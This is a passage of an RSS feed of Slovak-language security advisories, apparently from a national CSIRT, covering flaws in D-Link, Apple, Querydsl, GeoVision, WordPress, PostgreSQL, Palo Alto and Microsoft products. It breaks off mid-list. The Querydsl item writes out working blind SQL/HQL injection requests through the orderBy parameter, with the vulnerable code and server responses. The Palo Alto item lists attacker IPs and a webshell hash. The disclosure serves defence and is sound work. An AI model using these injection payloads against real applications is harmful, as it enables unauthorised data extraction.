					<description><![CDATA[<p><img src="/wp-content/uploads/2024/09/D-Link-Logo.wine_-1024x683.png" alt="" /></p>Spoločnosť D-Link varovala pred kritickou bezpečnostnou zraniteľnosťou v routroch DSR-150, DSR-150N, DSR-250, DSR-250N a DSR-1000N s ukončenou technickou podporou. Bližšie nešpecifikovaná...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/09/D-Link-Logo.wine_-1024x683.png" alt="" /></p>
<p><strong>Spoločnosť D-Link varovala pred kritickou bezpečnostnou zraniteľnosťou v routroch DSR-150, DSR-150N, DSR-250, DSR-250N a DSR-1000N s ukončenou technickou podporou. Bližšie nešpecifikovaná kritická zraniteľnosť umožňuje vzdialené vykonanie kódu.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>D-Link DSR-150 (ukončená technická podpora)</li>



<li>D-Link DSR-150N (ukončená technická podpora)</li>



<li>D-Link DSR-250 (ukončená technická podpora)</li>



<li>D-Link DSR-250N (ukončená technická podpora)</li>



<li>D-Link DSR-500N (ukončená technická podpora)</li>



<li>D-Link DSR-1000N (ukončená technická podpora)</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>Bez prideleného CVE identifikátora</strong> (CVSS skóre 9,8)<br><br>Kritická zraniteľnosť spočíva v pretečení medzipamäte zásobníka a vzdialený neautentifikovaný útočník by ju zaslaním špeciálne vytvorených požiadaviek mohol zneužiť na vykonanie škodlivého kódu.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Nakoľko sa jedná o produkty s ukončenou technickou podporou, spoločnosť D-LINK neplánuje vydať aktualizácie a odporúča prejsť na alternatívne produkty s platnou podporou. V prípade, že prechod na nové produkty nie je možné vykonať ihneď, odporúčame limitovať prístup k manažmentovému rozhraniu zariadení a použitie silných hesiel.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10415">https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10415</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/d-link-urges-users-to-retire-vpn-routers-impacted-by-unfixed-rce-flaw/">https://www.bleepingcomputer.com/news/security/d-link-urges-users-to-retire-vpn-routers-impacted-by-unfixed-rce-flaw/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1725/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Aktívne zneužívané zero-day zraniteľnosti v operačných systémoch macOS, iOS, iPadOS a visionOS a prehliadači Safari</title>
		<link>/posts/1721</link>
					<comments>/posts/1721#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 22 Nov 2024 08:48:32 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Apple]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=1721</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/11/Apple-Logo-1024x812.png" alt="" /></p>Spoločnosť Apple vydala bezpečnostné aktualizácie, ktoré opravujú 2 aktívne zneužívané zero-day zraniteľnosti v komponentoch operačných systémov macOS, iOS, iPadOS a visionOS...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/11/Apple-Logo-1024x812.png" alt="" /></p>
<p><strong>Spoločnosť Apple vydala bezpečnostné aktualizácie, ktoré opravujú 2 aktívne zneužívané zero-day zraniteľnosti v komponentoch operačných systémov macOS, iOS, iPadOS a visionOS a internetovom prehliadači Safari. CVE-2024-44308 by vzdialený neautentifikovaný útočník mohol zneužiť na vzdialené vykonanie kódu a CVE-2024-44309 na realizáciu XSS útokov.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>iOS 17 vo verziách starších ako 17.7.2</li>



<li>iOS 18 vo verziách starších ako 18.1.1</li>



<li>iPadOS 17 vo verziách starších ako 17.7.2</li>



<li>iPadOS 18 vo verziách starších ako 18.1.1</li>



<li>macOS Sequoia vo verziách starších ako 15.1.1</li>



<li>visionOS vo verziách starších ako 2.1.1</li>



<li>Safari vo verziách starších ako 18.1.1</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2024-44308</strong> (CVSS skóre 8,8)<br><br>Bližšie nešpecifikovanú zraniteľnosť v komponente JavaScriptCode by vzdialený neautentifikovaný útočník podvrhnutím špeciálne vytvoreného webového obsahu mohol zneužiť na vzdialené vykonanie kódu.</p>



<p><strong>CVE-2024-44309</strong> (CVSS skóre 6,1)<br><br>Zraniteľnosť s identifikátorom CVE-2024-44309 spočíva v nedostatočnom manažmente cookies v rámci komponentu WebKit a možno ju zneužiť na realizáciu XSS (Cross Site Scripting) útokov a získanie autentifikačných údajov vo forme cookies.<br><br><strong>Zneužitie oboch zraniteľností vyžaduje interakciu zo strany používateľa</strong>, ktorý musí kliknúť na špeciálne vytvorený URL odkaz alebo otvoriť špeciálne vytvorený webový obsah. Vyššie uvedené zraniteľnosti sú <strong>aktívne zneužívané na macOS zariadeniach s procesormi Intel</strong>.<br><br>Zraniteľnosti objavili bezpečnostní výskumníci z Google Threat Analysis Group.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu<span style="mso-fareast-font-family:&quot;Times New Roman&quot;;
     mso-bidi-font-family:Calibri;mso-bidi-theme-font:minor-latin;mso-fareast-language:
     SK"></span></strong></li>



<li><strong>Neoprávnený prístup k citlivým údajom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Spoločnosť Apple odporúča bezodkladnú aktualizáciu zraniteľných systémov na najnovšiu verziu.</strong></p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://support.apple.com/en-us/121752">https://support.apple.com/en-us/121752</a></li>



<li><a href="https://support.apple.com/en-us/121753">https://support.apple.com/en-us/121753</a></li>



<li><a href="https://support.apple.com/en-us/121754">https://support.apple.com/en-us/121754</a></li>



<li><a href="https://support.apple.com/en-us/121755">https://support.apple.com/en-us/121755</a></li>



<li><a href="https://support.apple.com/en-us/121756">https://support.apple.com/en-us/121756</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/apple-fixes-two-zero-days-used-in-attacks-on-intel-based-macs/">https://www.bleepingcomputer.com/news/security/apple-fixes-two-zero-days-used-in-attacks-on-intel-based-macs/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1721/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zraniteľnosť knižnice Querydsl a OpenFeign Querydsl umožňujúca SQL/HQL injection</title>
		<link>/posts/1713</link>
					<comments>/posts/1713#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 20 Nov 2024 14:04:52 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[Querydsl]]></category>
		<category><![CDATA[VJCSIRT]]></category>
		<guid isPermaLink="false">/?p=1713</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/11/querydsl.png" alt="" /></p>Bezpečnostní analytici CSIRT.SK objavili zraniteľnosť CVE-2024-49203 v&#160;Java knižnici Querydsl a OpenFeign Querydsl, ktorá umožňuje vykonávať útoky typu SQL/HQL injection. Zraniteľné...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/11/querydsl.png" alt="" /></p>
<p><strong>Bezpečnostní analytici CSIRT.SK objavili zraniteľnosť CVE-2024-49203 v&nbsp;Java knižnici Querydsl a OpenFeign Querydsl, ktorá umožňuje vykonávať útoky typu SQL/HQL injection.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>querydsl-jpa – 5.1.0</li>



<li>querydsl-apt – 5.1.0</li>



<li>hibernate-core – 6.1.1.Final</li>



<li>jakarta.persistence-api – 3.1.0</li>



<li>postgresql – 42.7.4</li>



<li>OpenFeign querydsl – 6.8</li>
</ul>



<p><em>Na uvedených verziách bola zraniteľnosť potvrdené. Nevylučujeme však, že je prítomná aj na ďalších verziách.</em></p>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2024-49203</strong><br><br>Zraniteľnosť sa nachádza v&nbsp;najnovšej verzii knižnice <em>Querydsl</em> (resp. <em>OpenFeign Querydsl</em>) a&nbsp;súvisí s&nbsp;absenciou ošetrovania používateľských vstupov, ktoré preberá funkcia <em>orderBy(OrderSpecifier order)</em>. Táto metóda slúži na usporiadanie výsledkov databázových dopytov. V&nbsp;prípade, že sa premenná <em>order</em> generuje pomocou používateľských vstupov, je možné prostredníctvom tejto premennej vykonávať HQL dopyty.<br><br>V&nbsp;prípade, že sa v&nbsp;kóde nachádza nasledujúci úryvok:</p>



<pre class="wp-block-code"><code>OrderSpecifier order = new OrderSpecifier(Order.ASC, pathBuilder.get(<strong>orderBy</strong>));<br>JPAQuery&lt;Test&gt; orderedQuery = query.orderBy(order);<br>return orderedQuery.fetch();</code></pre>



<p>kde hodnota premennej <em>orderBy</em> je poskytnutá používateľom, daná aplikácia je zraniteľná.</p>



<p>Keď používateľ navštívi stránku:</p>



<pre class="wp-block-code"><code>:8000/products?orderBy=<strong>name+INTERSECT+SELECT+t+FROM+Test+t+WHERE+(SELECT+'2')='2'+ORDER+BY+t.id</strong> HTTP/1.1</code></pre>



<p>vie vykonať takzvanú blind SQL injection, kde svoj SQL príkaz dá na miesto <em>SELECT+&#8217;2&#8242;</em> a&nbsp;následne skúša akej hodnote sa rovná výsledok daného SQL príkazu nahradením &#8216;2&#8217; za všetky možné hodnoty.</p>



<p>V&nbsp;našom príklade sa vygeneruje nasledovný SQL dopyt:</p>



<pre class="wp-block-code"><code>SELECT t1 FROM Test t1 Order By t1.<strong>name INTERSECT SELECT t FROM Test t WHERE (SELECT '2')='2' ORDER BY t.id</strong> ASC</code></pre>



<p>V&nbsp;našom príklade by útočník získal všetky hodnoty prítomné v&nbsp;tabuľke Test, keďže <em>(SELECT+&#8217;2&#8242;)=&#8217;2&#8242;</em> sa vyhodnotí ako <em>True</em> a&nbsp;teda sa spraví prienik všetkých prvkov v&nbsp;tabuľke Test t1 a&nbsp;Test t, ktorý je rovný všetkým prvkom v&nbsp;tabuľke Test.</p>



<p>Odpoveď by teda vyzerala nasledovne:</p>



<pre class="wp-block-code"><code>HTTP/1.1 200<br>Content-Type: application/json<br>Date: Tue, 08 Oct 2024 13:34:57 GMT<br>Content-Length: 27<br><br><br>&#91;{"id":1,"name":"test123"}]</code></pre>



<p>V&nbsp;prípade, že navštívime stránku:</p>



<pre class="wp-block-code"><code>:8000/products?orderBy=<strong>name+INTERSECT+SELECT+t+FROM+Test+t+WHERE+(SELECT+'1')='2'+ORDER+BY+t.id</strong> HTTP/1.1</code></pre>



<p>Kde sa podmienka vo WHERE časti vyhodnotí ako <em>False</em> dostaneme nasledovnú odpoveď:</p>



<pre class="wp-block-code"><code>HTTP/1.1 200<br>Content-Type: application/json<br>Date: Tue, 08 Oct 2024 13:36:30 GMT<br>Content-Length: 2<br><br>&#91;]</code></pre>



<p>Zraniteľnosť bola overovaná s použitím&nbsp;nasledujúcich verzií knižníc:</p>



<ul>
<li>querydsl-jpa – 5.1.0</li>



<li>querydsl-apt – 5.1.0</li>



<li>hibernate-core – 6.1.1.Final</li>



<li>jakarta.persistence-api – 3.1.0</li>



<li>postgresql – 42.7.4</li>



<li>OpenFeign querydsl – 6.8</li>
</ul>



<p>O&nbsp;existencii zraniteľnosti sme informovali autorov knižnice 9. 10. 2024.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Únik citlivých informácií</strong></li>



<li><strong>Denial of service</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Pokiaľ pri vývoji webovej aplikácie v&nbsp;jazyku Java využívate knižnicu <em>Querydsl</em> (resp. <em>OpenFeign Querydsl</em>) a&nbsp;používate metódu <em>orderBy</em> s&nbsp;použitím používateľských vstupov, odporúčame dodatočne ošetriť používateľské vstupy v&nbsp;rámci best practice bezpečného vývoja.</p>



<p><strong>Odkaz:</strong></p>



<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-49203">https://nvd.nist.gov/vuln/detail/CVE-2024-49203</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1713/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Aktívne zneužívaná kritická zraniteľnosť zariadení GeoVision</title>
		<link>/posts/1680</link>
					<comments>/posts/1680#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 18 Nov 2024 13:28:28 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[command injection]]></category>
		<category><![CDATA[GeoVision]]></category>
		<guid isPermaLink="false">/?p=1680</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/11/GeoVision.png" alt="" /></p>Viacero produktov spoločnosti GeoVision s ukončenou podporou zneužívajú útočníci pre variant botnetu MIRAI. Infekcia prebieha po zneužití kritickej zraniteľnosti, ktorá umožňuje...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/11/GeoVision.png" alt="" /></p>
<p><strong>Viacero produktov spoločnosti GeoVision s ukončenou podporou zneužívajú útočníci pre variant botnetu MIRAI. Infekcia prebieha po zneužití kritickej zraniteľnosti, ktorá umožňuje vykonávanie systémových príkazov bez autentifikácie.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>GV-VS12</li>



<li><span style="font-size:12.0pt;mso-bidi-font-family:Calibri;mso-bidi-theme-font:
     minor-latin"></span>GV-VS11</li>



<li><span style="font-size:12.0pt;mso-bidi-font-family:Calibri;mso-bidi-theme-font:
     minor-latin"></span>GV-DSP_LPR_V3</li>



<li><span style="font-size:12.0pt;mso-bidi-font-family:Calibri;mso-bidi-theme-font:
     minor-latin"></span>GVLX 4 V2</li>



<li>GVLX 4 V3</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2024-11120</strong> (CVSS skóre 9,8)</p>



<p>Útočníci aktívne zneužívajú zero-day zraniteľnosť produktov GeoVision GV-VS12, GV-VS11, GV-DSP LPR V3, GV-LX4C V2 a GV-LX4C V3 s ukončenou technickou podporou na ich infekciu a zapojenie do variantu botnetu MIRAI, ktorý slúži pre realizáciu DDoS útokov a ťažbu kryptomien. Kritickú zraniteľnosť s označením CVE-2024-11120 by vzdialený neautentifikovaný útočník mohol zneužiť na injekciu a vykonávanie systémových príkazov a získanie úplnej kontroly nad zariadením. Nakoľko sa jedná o produkty s ukončenou podporou, výskumníci odporúčajú prechod na alternatívne produkty alebo limitovať prístup k zraniteľným systémom prostredníctvom sieťových a bezpečnostných prvkov.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vykonávanie ľubovoľných príkazov</strong></li>



<li><strong>Získanie kontroly nad zariadením</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Zraniteľné zariadenia už výrobca nepodporuje, preto odporúčame bezodkladnú výmenu za podporované alternatívy.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://www.twcert.org.tw/en/cp-139-8237-26d7a-2.html">https://www.twcert.org.tw/en/cp-139-8237-26d7a-2.html<span style="font-size:12.0pt;line-height:107%;mso-bidi-font-family:Calibri;
mso-bidi-theme-font:minor-latin"></span></a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-11120">https://nvd.nist.gov/vuln/detail/CVE-2024-11120<span style="font-size:12.0pt;line-height:107%;mso-bidi-font-family:Calibri;
mso-bidi-theme-font:minor-latin"></span></a></li>



<li><a href="https://x.com/Shadowserver/status/1857356335605530952">https://x.com/Shadowserver/status/1857356335605530952</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1680/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť modulu WordPress Really Simple Security</title>
		<link>/posts/1677</link>
					<comments>/posts/1677#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 15 Nov 2024 15:41:44 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<guid isPermaLink="false">/?p=1677</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/11/really-simple-ssl-featured-image-1024x536.png" alt="" /></p>Vývojári modulu WordPress Really Simple Security opravili kritickú zraniteľnosť, ktorá umožňuje neprihlásenému útočníkovi získať prístup do zraniteľného systému ako ľubovoľný...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/11/really-simple-ssl-featured-image-1024x536.png" alt="" /></p>
<p><strong>Vývojári modulu WordPress Really Simple Security opravili kritickú zraniteľnosť, ktorá umožňuje neprihlásenému útočníkovi získať prístup do zraniteľného systému ako ľubovoľný používateľ, vrátane administrátora.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>WordPress Really Simple Security (Free, Pro a Pro Multisite) 9.0.0 &#8211; 9.1.1.1</li>
</ul>



<p><em>Zraniteľnosť je prítomná, keď je povolené dvojfaktorové overovanie.</em></p>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2024-10924</strong> (CVSS skóre 9,8)<br><br>Modul WordPress Really Simple Security obsahuje kritickú zraniteľnosť, ktorá dovoľuje obchádzanie autentifikácie. Zraniteľnosť súvisí s nevhodným spracovaním chýb pri kontrole používateľov vo funkcii check_login_and_get_user, ktorá je súčasťou REST API pre dvojfaktorové overovanie. Pri zlyhaní prihlásenia chyba spôsobí, že používateľ je napriek tomu prihlásený do konta podľa zadaného ID. Neautentifikovaný útočník sa tak môže do zraniteľnej inštancie prihlásiť ako ľubovoľný používateľ, vrátane administrátora.<br><br>Podľa spoločnosti Defiant sú potenciálne zraniteľné približne 4 milióny webstránok.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Obídenie autentifikácie</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia WordPress Really Simple Security (Free, Pro a Pro Multisite) aspoň na verziu 9.1.2.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://www.wordfence.com/threat-intel/vulnerabilities/detail/really-simple-security-free-pro-and-pro-multisite-900-9111-authentication-bypass">https://www.wordfence.com/threat-intel/vulnerabilities/detail/really-simple-security-free-pro-and-pro-multisite-900-9111-authentication-bypass</a></li>



<li><a href="https://www.securityweek.com/critical-plugin-flaw-exposed-4-million-wordpress-websites-to-takeover/">https://www.securityweek.com/critical-plugin-flaw-exposed-4-million-wordpress-websites-to-takeover/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1677/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Závažná zraniteľnosť PostgreSQL umožňuje vykonávať kód</title>
		<link>/posts/1673</link>
					<comments>/posts/1673#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 15 Nov 2024 15:36:12 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[PostgreSQL]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=1673</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/11/PostgreSQL-Logo-1024x640.png" alt="" /></p>V PostgreSQL bola opravená vysoko závažná zraniteľnosť súvisiaca s nevhodnou kontrolou premenných prostredia v PL/Perl. Jej zneužitím môže útočník získať schopnosť vykonávať ľubovoľný...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/11/PostgreSQL-Logo-1024x640.png" alt="" /></p>
<p><strong>V PostgreSQL bola opravená vysoko závažná zraniteľnosť súvisiaca s nevhodnou kontrolou premenných prostredia v PL/Perl. Jej zneužitím môže útočník získať schopnosť vykonávať ľubovoľný kód, získať citlivé informácie, alebo vykonať inú činnosť v závislosti napríklad od zneužitej premennej.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>PostgreSQL verzie staršie ako 17.1, 16.5, 15.9, 14.14, 13.17 a 12.21</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2024-10979</strong> (CVSS skóre 8,8)</p>



<p>Vývojári PostgreSQL opravili vysoko závažnú zraniteľnosť v module PL/Perl, ktorá súvisí s nevhodnou kontrolou premenných prostredia jazyka Perl. Útočník s nízkymi oprávneniami môže tieto premenné meniť, napríklad môže pozmeniť premennú „PATH“, čím môže docieliť presmerovanie ku podvrhnutým škodlivým súborom a ich následným spustením vykonanie ľubovoľného kódu. Zraniteľnosť môže viesť tiež k úniku citlivých informácií a iným škodám.<br><br>Aktualizácie opravujú aj ďalšie tri zraniteľnosti z nižšou závažnosťou. Tieto umožňujú zvýšenie oprávnení a podvrhnutie a neautorizovanú úpravu dát.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vykonanie ľubovoľného kódu</strong></li>



<li><strong>Únik citlivých informácií</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia PostgreSQL aspoň na verziu 17.1, 16.5, 15.9, 14.14, 13.17 alebo 12.21.<br><br>Zraniteľnosť môžete mitigovať obmedzením množiny povolených rozšírení (povolenia <em>CREATE EXTENSIONS</em>) a nastavením parametra <em>shared_preload_libraries</em> pre načítanie iba vyžadovaných rozšírení.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://www.postgresql.org/about/news/postgresql-171-165-159-1414-1317-and-1221-released-2955/">https://www.postgresql.org/about/news/postgresql-171-165-159-1414-1317-and-1221-released-2955/<span style="font-size:12.0pt;line-height:107%;mso-bidi-font-family:Calibri;
mso-bidi-theme-font:minor-latin"></span></a></li>



<li><a href="https://thehackernews.com/2024/11/high-severity-flaw-in-postgresql-allows.html">https://thehackernews.com/2024/11/high-severity-flaw-in-postgresql-allows.html</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1673/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Aktívne zneužívaná kritická zraniteľnosť Palo Alto</title>
		<link>/posts/1671</link>
					<comments>/posts/1671#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 15 Nov 2024 15:31:00 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Palo Alto]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=1671</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/10/palo-alto-networks-inc-logo-vector.png" alt="" /></p>Spoločnosť Palo Alto vydala varovanie ohľadom bližšie nešpecifikovanej kritickej zraniteľnosti v manažmentovom rozhraní firewallov, ktorá umožňuje vzdialené vykonávanie príkazov. Zraniteľnosť...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/10/palo-alto-networks-inc-logo-vector.png" alt="" /></p>
<p><strong>Spoločnosť Palo Alto vydala varovanie ohľadom bližšie nešpecifikovanej kritickej zraniteľnosti v manažmentovom rozhraní firewallov, ktorá umožňuje vzdialené vykonávanie príkazov. Zraniteľnosť je aktívne zneužívaná a existuje na ňu verejne dostupný exploit.</strong><br><strong>[Aktualizované 22.11.2024]</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>PAN-OS verzie staršej ako 10.2.12-h2, 11.0.6-h1, 11.1.5-h1 a 11.2.4-h1</li>
</ul>



<p><em>Prisma Access a&nbsp;Cloud NGFW by podľa výrobcu nemali byť ovplyvnené.</em></p>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2024-0012</strong> (CVSSv4.0 skóre 9,3)<br><br>Spoločnosť Palo Alto informovala o kritickej zraniteľnosti, ktorá umožňuje neautentifikovaným útočníkom vzdialene vykonávať príkazy v manažmentovom rozhraní firewallov. Bližšie informácie spoločnosť neuverejnila.<br><br>Palo Alto upozorňuje, že zraniteľnosť aktívne zneužívajú útočníci. Útoky smerujú na manažmentové rozhrania firewallov dostupné z internetu. Pre zraniteľnosť existuje verejne dostupný exploit.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonávanie príkazov</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>V&nbsp;súčasnosti Palo Alto pripravuje opravné aktualizácie. Do ich vydania spoločnosť odporúča zabezpečiť prístup ku manažmentovému rozhraniu podľa jej <a href="https://live.paloaltonetworks.com/t5/community-blogs/tips-amp-tricks-how-to-secure-the-management-access-of-your-palo/ba-p/464431" data-type="link" data-id="https://live.paloaltonetworks.com/t5/community-blogs/tips-amp-tricks-how-to-secure-the-management-access-of-your-palo/ba-p/464431">best practices</a>.<br><em><span style="text-decoration: underline;">Aktualizácia 20.11.2024:</span> Spoločnosť vydala aktualizácie pre PAN-OS, ktoré zraniteľnosť opravujú. Bezodkladne aktualizujte PAN-OS aspoň na verziu 10.2.12-h2, 11.0.6-h1, 11.1.5-h1 alebo 11.2.4-h1. Palo Alto vydala opravy aj pre viaceré pod-verzie. Kompletný zoznam nájdete <a href="https://security.paloaltonetworks.com/CVE-2024-0012" data-type="link" data-id="https://security.paloaltonetworks.com/CVE-2024-0012">tu</a>.</em></p>



<p><strong>Indikátory kompromitácie:</strong></p>



<p><span style="text-decoration: underline;">IP (viaceré patria poskytovateľom VPN, teda nemusia súvisieť nevyhnutne s útokom):</span><br>91.208.197[.]167<br>104.28.208[.]123<br>136.144.17[.]146<br>136.144.17[.]149<br>136.144.17[.]154<br>136.144.17[.]158<br>136.144.17[.]161<br>136.144.17[.]164<br>136.144.17[.]166<br>136.144.17[.]167<br>136.144.17[.]170<br>136.144.17[.]176<br>136.144.17[.]177<br>136.144.17[.]178<br>136.144.17[.]180<br>173.239.218[.]248<br>173.239.218[.]251<br>209.200.246[.]173<br>209.200.246[.]184<br>216.73.162[.]69<br>216.73.162[.]71<br>216.73.162[.]73<br>216.73.162[.]74<br><br><span style="text-decoration: underline;">PHP webshell (SHA256):</span><br>3C5F9034C86CB1952AA5BB07B4F77CE7D8BB5CC9FE5C029A32C72ADC7E814668</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://security.paloaltonetworks.com/PAN-SA-2024-0015">https://security.paloaltonetworks.com/PAN-SA-2024-0015</a></li>



<li><a href="https://security.paloaltonetworks.com/CVE-2024-0012">https://security.paloaltonetworks.com/CVE-2024-0012</a></li>



<li><a href="https://unit42.paloaltonetworks.com/cve-2024-0012-cve-2024-9474/">https://unit42.paloaltonetworks.com/cve-2024-0012-cve-2024-9474/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1671/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Microsoft v rámci novembrového Patch Tuesday opravil 4 kritické zraniteľnosti</title>
		<link>/posts/1667</link>
					<comments>/posts/1667#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 14 Nov 2024 14:20:12 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[Patch Tuesday]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[Spoofing]]></category>
		<guid isPermaLink="false">/?p=1667</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/03/Windows_10_konci_podpora-1.png" alt="" /></p>Spoločnosť Microsoft vydala v novembri 2024 balík opráv pre portfólio svojich produktov opravujúci 89 zraniteľností, z ktorých 52 umožňuje vzdialené vykonávanie kódu....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/03/Windows_10_konci_podpora-1.png" alt="" /></p>
<p><strong>Spoločnosť Microsoft vydala v novembri 2024 balík opráv pre portfólio svojich produktov opravujúci 89 zraniteľností, z ktorých 52 umožňuje vzdialené vykonávanie kódu. Kritické zraniteľnosti sa nachádzajú vo frameworku .NET, produkte Visual Studio, komponentoch Windows VMSwitch a Window Kerberos a online platforme airlift.microsoft.com a možno ich zneužiť na eskaláciu privilégií a vzdialené vykonanie škodlivého kódu. Zraniteľnosti v komponentoch Windows NT LAN Manager (CVE-2024-43451) a Windows Task Scheduler (CVE-2024-49039) sú aktívne zneužívané útočníkmi.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>.NET 9.0 inštalované na Linux</li>



<li>Azure CycleCloud 8.0.0 – 8.0.2</li>



<li>Azure CycleCloud 8.1.0 – 8.1.1</li>



<li>Azure CycleCloud 8.2.0 – 8.2.2</li>



<li>Azure CycleCloud 8.3.0</li>



<li>Azure CycleCloud 8.4.0 – 8.4.2</li>



